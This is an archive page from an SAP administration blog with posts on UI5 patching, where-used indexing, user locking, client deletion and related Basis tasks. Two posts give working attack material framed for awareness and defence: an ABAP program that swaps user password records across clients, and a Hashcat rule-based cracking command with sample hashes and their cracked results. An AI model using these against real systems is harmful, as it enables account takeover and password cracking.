saptechnicalguru – Page 35 – Saptechnicalguru.com

FIORI last digit patching

Questions that will be answered in this blog are:

What are the current UI5 versions available and supported?
How to perform UI5 last digit patching?
When to patch and when to upgrade to new FIORI server?

Current UI5 versions available

The current UI5 version overview is published by SAP on this site.

The overview gives information on the main versions (like 1.56, 1.58, etc) and the available last digit patches (like 1.56.14, 1.58.5, etc).

Your own version can be found with this URL:

http(s)://<your server><your port>/sap/public/bc/ui5_ui5/index.html

Example:

This server has versions 1.48 (last digit patch 13) and 1.52 (last digit patch 8).

Last digit patching

To patch the last digit to the newest version, you first look for the corresponding OSS note. Search for term “ABAP SAPUI5 1.xx release” with xx being your release. For our example it is oss note 2550980 – ABAP SAPUI5 1.52 release. Or take the generic note: 3155948 – ABAP SAPUI5 patch version update.

The note describes per last digit version which file to download and which FLP note to apply after you do the patching.

In this example we will patch to level 1.52.23. The note tells us do use this file and note:

Download this file from the SAP software download section.

Check if the last digit patching program needs bug fix OSS notes ( /UI5/UI5_UPLOAD_PATCH_TO_MIME ).

2614248 - Upload UI5 patch error: Unable to lock the source code to edit
2997207 - /UI5/UI5_UPLOAD_PATCH_TO_MIME: Load UI5 archive from application server
3075898 - /UI5/UI5_UPLOAD_PATCH_TO_MIME: Problems detected with transport-related checks of Change Ctrl Mgmt
3145139 - Fix content type of UI5 files with hashed names in MIME Repository
3153462 - UI Library Patch Error while parsing an XML stream: 'BOM / charset detection failed'.
3220439 - Prerequisite for improvement of UI5 patch installation
3271129 - "File contains no Demokit" error in report /UI5/UI5_UPLOAD_PATCH_TO_MIME for UI5 1.102 release
3280413 - SAPUI5 patch upload: Prevent inconsistent file state after Virus Scan misconfiguration

The upload and processing of the last digit patch file can take a long time (typically 1 hour). If you don’t take measures the system will dump after 10 minutes with a time-out.

Goto RZ11 and set rdisp/max_wprun_time to value 12000 (and undo this after the patching). In newer versions of netweaver the parameter is rdisp/scheduler/max_runtime, which needs to be set to 120m.

Now start program /UI5/UI5_UPLOAD_PATCH_TO_MIME:

The file has to point to the file you have downloaded to your desktop. Use F4 to select the correct file. The request /task must be a valid unreleased workbench request.

First run in test mode. Wait until it is done (1 hour is normal…). If the result is ok, remove the tick box for test mode and run real mode (yes, 1 more hour to wait).

End result should look like:

After the application of the patch, apply the FLP note (in this case note 2605065).

Now you can start the version overview again to see if the patching was ok:

As you can see the 1.52 version is now updated to level 1.52.23. The 1.48 version is the same.

More background in OSS note 2630700 – SAPUI5 patch update fails.

Transport of last digit patch to Q and P systems

When you want to apply last digit patch on Q and P systems, you can move the transport you have selected in the upload step. The unfortunate thing is that the import to Q and P of this transport also takes about 1 hour. This means you need to properly plan the import (especially on production select a time where no users are using FIORI apps).

Patching versus upgrading

The goal of last digit patching is simple: it solves bugs in the SAP delivered UI5 libraries. But it can also bring new bugs.

Best patching strategy: only patch when you have a bug that must be solved. Then patch to latest version. Don't think last minus one, since the UI5 patches come every 2 to 4 weeks: just take latest one. If your system is stable: don't patch.

Upgrading to a higher FIORI frontend server will give you new libraries which will have new functions. Also: the higher frontend servers have better performance due to faster ABAP kernel, better caching features etc. If you are using newer S4HANA solutions, you will be forced to upgrade frontend server to specific minimum version.

Best practice upgrading: if you are using central FIORI gateway server plan for upgrade every year or every 2 years at minimum. Every year at least apply support pack: the support pack will also to do last digit patching as well. After support pack or full version upgrade immediately patch to last digit version available before starting the testing.

Background OSS notes

Background notes:

ABAP where used index

A nice feature in ABAP is the where used function on usage of programs, tables fields etc, in both standard can custom code. For this function to work properly the ABAP where used index must be up-to-date.

This blog will give answers to the following questions:

How to re-run the ABAP where used index?
How to speed up the ABAP where used index by running in parallel mode?
Which bug fix notes should I apply to get a good ABAP where used index?

How to run ABAP where used index?

You can run the programs SAPRSEUB and SAPRSEUC yourself in background, or start program SAPRSEUJ to schedule the jobs for you.

Program SAPRSEUB will index standard SAP objects. Program SAPRSEUC will index custom objects.

More background can be found in OSS note 18023 – Jobs EU_INIT, EU_REORG, EU_PUT. And OSS note 28022 – Customer system: Where-used list for SAP Objects.

S/4 HANA readiness check

For the S/4HANA readiness check (see note 2290622 – SAP Readiness Check for SAP S/4HANA) it is mandatory to run job SAPRSEUC. For more background information on the S/4 HANA readiness check see this blog.

Stopping the job

If for whatever reason you want to stop the jobs, use program SAPRSEUB_STOP.

Performance of the where used jobs using parallel processing

Check if OSS note 2228460 – Runtime of job EU_INIT, SAPRSEUB, performance is applied. Using settings in table RSEUPACTRL you can control the runtime behavior of the parallel execution of the where used indexing process. You can check in SM50 and SM66 if the job is using the parallel

OSS notes with bug fixes

The following bug fix OSS notes can be check if they are valid for your release:

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

How to execute a cross client access hack?
How to detect this attack?
What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.

So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

Client opening and closing in the source client
The presence of the ABAP code
The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
ADMIN access from same terminal as the hacker is using to logon to the source client

Preventive measures

The following preventive measures can be taken:

Reset all standard passwords in all systems in all clients (see blog)
Delete no longer needed clients 001 and 066 (see blog)
Switch on audit logging in all clients (see blog)

Mass locking and end validity date of users

There are 2 good reasons for mass locking and ending validity date of user: security and licenses.

Questions that will be answered in this blog are:

How can I mass lock users automatically if they have not logged on for a certain time?
How can I mass set the validity date of the users that did not log on for a certain time?

Automatic lock of user after expired logon

In RZ11 you can set parameter login/password_max_idle_productive with an amount in days.

If the user (including yourself) did not logon to the system after this amount of days the password is still valid, but it does not allow you to logon.

If the user tries to logon after the period he will see this error message and cannot continue:

In SU01 such a user looks like this:

If you also want to automatically lock users after you give them a new password, use the parameter login/password_max_idle_initial.

Initial passwords is one of the nice ways of entering a system as hacker. Especially if the initial password used by the admin is more or less the same (like Welcome_1234!). Countermeasure: instruct your admins to use the Password Generator. This will generate long random once off password.

Mass setting of user validity date

For user measurement and security reasons you want to limit the validity period as well. Users who are locked still count for user measurement (see blog on license measurement tips & tricks). Users locked and unlocked by some method can be security threat.

Standard SAP program RSUSR_LOCK_USERS (built on top of program RSUSR200) is the tool to achieve this.

It has quite a long selection screen:

On the first block set the dates for last logon and password change to get a good selection of users.

On the second block very important to only select Dialog Users.

First run with Test Selection to get a list. If you are happy with the list, run it with Set End Of Validity Period.

OSS notes

Performance and bug notes (OSS search hints RSUSR200 and RSUSR_LOCK_USERS):

Client 001 and 066 deletion

Questions that will be answered in this blog:

Why delete clients 001 and 066?
How to delete clients 001 and 066?
How to test the deletion before executing in a productive environment?

Why delete clients 001 and 066?

The clients 001 and 066 had a purpose in the past and do not have them any more.

The only thing they do now is pose a security threat. Access can be gained to these clients, for example via standard SAP users, and from these client you could take over the system via a cross client attack. Background on client 066 can be found in OSS note 1897372 – EarlyWatch Mandant 066 – Can Client 066 be deleted?.

Also unwanted batch jobs might be still running from these clients consuming resources.

For an S4HANA system conversion, these clients must be deleted.

You can use SAP Focused Run security and configuration validation to quickly detect existance of client 001 and/or 066. Read more in this blog.

How to execute client 001 and 066 deletion?

You can delete client 001 and 066 according to the instructions in SAP note 1749142 and on the respective blog “How to remove unused clients including client 001 and 066” on SCN.

Testing the deletion

The deletion can be tested on a development and QA system before it is done on productive system. If really in doubt copy the productive system to a different system and perform the deletion there first as a test.

SAP password hash hacking Part IV: rule based attack

This blog series will explain the process of hacking SAP password hashes: also know as SAP password hacking. The process of hacking will be explained and appropriate countermeasures will be explained.

In this fourth blog we will continue with more complex attacks on the SAP password hashes and will also explain more preventive measures.

For the first blog on attacking the SAP BCODE hash click here.

For the second blog on attacking the SAP PASSCODE has click here.

For the third blog on attacking the SAP PWDSALTEDHASH has click here.

Questions that will be answered in this blog are:

How does the rule based attack work?
How to use the rules on found passwords?
Where to find good rule books?

The rule based attack

The dictionary rule book attack is using the dictionary as input and then applies rules to the dictionary to generate a new password candidate.

Example words we will use are Password and Welcome.

Examples of apply some rules:

Replace a with @ will give P@ssword
Replace o with 0 will give Passw0rd and Welc0me
Replace s with $ will give Pa$$word
Replace l with ! will give We!come
All rules above combined will give P@$$w0rd and We!c0me

For full list of possible rule syntax see Hashcat site on rule-based attack.

Suppose we have guessed one correct password for one user. He made the password Welcome1!.

Now we will construct some rules:

Replace e with 3, rule will be se3
Replace l with 1 and l with !, rules will be sl1 and sl!
Replace o with 0, rule will be so0

We use these 3 hashes as input:

{x-issha, 1024}riqL3PXHJMOKkofOv1I4ObteIEGKw/OMny0U8MzMZ04=
{x-issha, 1024}7SC51LKZChMcpwmixb/ca/+qYvDxsXTbR3mE0IPrsaU=
{x-issha, 1024}AxErKhue0RAUveCTBgpAiJIaSDWGKdjpooiDSn5sTtg=

We construct an input file with word Welcome1! and a file with these rules:

se3

sl!

sl1

so0

Now we call Hashcat with the rule based attack mode:

hashcat64 -a 0 -m 10300 -p : --session=all -o "C:\hashes_found.txt" --outfile-format=3 -n 32 --gpu-temp-abort=80 -r "C:\simplerules.txt" "C:\hashes.txt" "C:\welcome.txt"

Great: 2 catches out of 3:

{x-issha, 1024}riqL3PXHJMOKkofOv1I4ObteIEGKw/OMny0U8MzMZ04=:We1come1!
{x-issha, 1024}AxErKhue0RAUveCTBgpAiJIaSDWGKdjpooiDSn5sTtg=:Welc0me1!

Now let’s add these rules:

o03
o13
o23

This means replace first character with digit 3, repeat for second and third.

We run again Hashcat and find the 3rd one:

{x-issha, 1024}7SC51LKZChMcpwmixb/ca/+qYvDxsXTbR3mE0IPrsaU=:W3lcome1!

What has happened here? Why is this found now, and not before with the se3 rule, which should substitute the e with 3? Pretty simple: replace e with 3 in word Welcome1! will give W3lcom31!. So it replaces all and not first one. This is there background of having many rules.

Huge rulesets

With the Hashcat download you get a special directory called rules. Here there are some big rulesets available.

The nicest one is the RockYou list of rules. This is constructed based on the RockYou password list hacked in 2009 where 32 million passwords leaked. Based on English dictionary somebody has constructed the rules to come to most of these passwords.

Effectiveness of the attack

The effectiveness of the rule based attack is quite high. If you have found 1 password, you just run the complete ruleset of one of the huge lists to find multiple variations. People are not so inventive and creative. You will be surprised on the amount of password variations you find on the following words:

Welcome
Summer
Winter
Password
Apple
Android
Google

Hackers don’t start with the full dictionary. They start with the top 1000 words and apply many rules to them. From the passwords found they will start to derive patterns of the users. Any new password is processed through many new rules to generate candidates with higher potential.

The name and or abbreviation of a company is word number 1 to add to the favorite word list.

Further optimization of the attack speed

For optimizing the attack speed, read the fifth blog on SAP password hash hacking here.

Prevention measure 1: frequent change and large change per time

Many companies have implemented a more faster cycle of password changes. In the past once per year was common. Nowadays 60 to 90 days is more common practice. Set this in profile parameter: login/password_expiration_time.

More important is to make a larger change per time the password changes. This is to avoid the rule-attacks explained above to become very effective. How many people just simply change and increase single digit in password? Or increase the special with the next one on the keyboard. Set the profile parameter login/min_password_diff to sufficiently high value of 3 or more.

Prevention measure 2: length

Explain to your users that length is more important than complexity by using this famous explanation:

Prevention measure 3: stronger hashes

Stronger hashes simply take more time to crack. To set stronger hashes, read this dedicated blog.

Next blog on password hacking

The fifth blog on password hacking is about optimizing the attack speed. Read on in the blog. And the blog on extended word lists.

Output device NULL

For some batch jobs you want to have the execution done and don’t want to fill up your system with large spool files of this execution. This blog will explain to setup printer NULL to have a batch job suppress the output generation.

Questions that that will be answered in this blog are:

How do I setup printer NULL?
How to test the setup of printer NULL?
Where to find more background information on printer NULL?

Setup of printer NULL

Start transaction SPAD to define a new printer. Now create printer call NULL (with long and short name both NULL):

Select a simple windows driver. Fill the other mandatory fields. Add the message description clearly that the output will be lost.

Save the printer definition.

Testing the NULL printer

From the blog explaining the technical clean up we will take program RSWWHIDE. This program generates huge amount of output (per deleted item 3 to 10 lines). We will run the program twice in test mode: once with printer NULL and once with printer LP01 (default printer). Selection of printer NULL is same as with any printer:

Result in SM37:

The first run with printer NULL has suppressed the generation of the spool file.

Background OSS note

All background on output device NULL can be read in OSS note 181571 – Output device NULL.

Initial ABAP webdynpro activation

This blog will explain the initial activation in SICF needed to make ABAP for webdynpro work in your system.

Questions that will be answered are:

What is the short minimum list of services that must be activated?
Where can I find the full list of services?

Short list

SICF mandatory services per system:

/default_host/sap/bc/webdynpro
/default_host/sap/public/bc/ur
/default_host/sap/public/bc/icons
/default_host/sap/public/bc/icons_rtl
/default_host/sap/public/bc/webicons
/default_host/sap/public/bc/pictograms
/default_host/sap/public/bc/webdynpro/* (ssr, mimes, and so on)
/default_host/sap/public/icman

For custom webdynpro for ABAP developments also activate the following services on the development system:

/default_host/sap/public/bc/webdynpro/viewdesigner
/default_host/sap/bc/wdvd/

Full list

The actual list of SICF services is described in OSS note 1088717 – Active services for Web Dynpro ABAP in transaction SICF. This also contains the services in case of more complex situations for floor plan management, testing and load distribution.

Scanning ABAP code: ABAP search tool

This blog will explain how to scan ABAP coding in search of a specific keyword or string. Many times older or badly written programs contain hard code logic like system ID’s, plant codes, movement types, order types etc. When a larger business change happens you need to find these codes in your ABAP code and act on them. This blog will explain how to do this search.

Questions that will be answered are:

How does the scan program work?
How to search for certain strings?
How to search for words in the comments?

ABAP search tool

You can start the ABAP search tool with transaction code CODE_SCANNER:

For testing 2 simple programs are written:

REPORT zscantest1.

IF syst-sysid EQ 'S4H'.
  WRITE: 'development system'.
ELSEIF syst-sysid EQ 'S4P'.
  WRITE: 'production system'.
ENDIF.

REPORT zscantest2.

DATA zt001w TYPE t001w.

SELECT SINGLE werks FROM t001w INTO zt001w.

IF zt001w-werks EQ 'DE01'.
  WRITE: 'German plant'.
ELSEIF zt001w-werks  EQ 'US01'.
* USA plant
  WRITE: 'US plant'.
ELSE.
  WRITE: 'diffferent plant'.
ENDIF.

If we now start a search with the word ‘S4H’ we get this result:

A hard coded SID.

If we search with ‘US01’ we get this result:

A hard coded plant.

If we search with ‘USA’ we get this result:

The word we were looking for is in the comment lines.

Search alternative program RS_ABAP_SOURCE_SCAN

In SAP note 2764076 – CODE_SCANNER not working properly, SAP explains that CODE_SCANNER might not always work for every release. They offer alternative program RS_ABAP_SOURCE_SCAN (there is no transaction code for this program, so start via SE38):

Bug fix notes:

Mechanics behind SAP user measurement

This blog will analyze some of the tables behind the SAP user license measurement.

Warning: the list of tables below is not complete. Do not base any assumptions on the content of these tables in your system. In updates and newer versions all content can change. The tables and the text in blog is to give you insight into the process. In any contract SAP will claim the right for inspection of actual usage of your system versus the license rights in your contract.

Questions that will be answered are:

How do I know which objects are measured?
How are objects measured?
How can I find actual measured objects?

The general user measurement principles are explained in the blog on USMM.

The tables behind license measurement

The best table to start with is the TUAPP table: measurement of applications.

Example is given below:

Here you can see that Advanced ATP is measured via call function module. In SE37 you can lookup the function module and see inside the code what exactly is measured:

The other entry in TUAPP we will take as example is Procurement Orders. Its application ID is 5000 and does not measure via function module.

First we get the application to unit and unit name from table TUAPP_UNT (units themselves are defined in table TUUNT):

Now we see procurement is counting Inquiry, Purchase order, Contract, Scheduling Agreement and Others.

The actual values read by the measurement for the application counters are stored in table TUCNT:

The tables behind the AC checks

The AC (anti cheating) modules use bit different tables.

Table TUL_AC_UNIT is to denote the table to count on:

Here you see the main procurement table EKKO has ID number 5018.

In table TUL_ACTTC you can lookup this value:

This data will be used in dynamic SQL statement that will list the user name (ERNAM) who did the create or change and uses AEDAT (last change or creation date) for table EKKO to count for check 5018.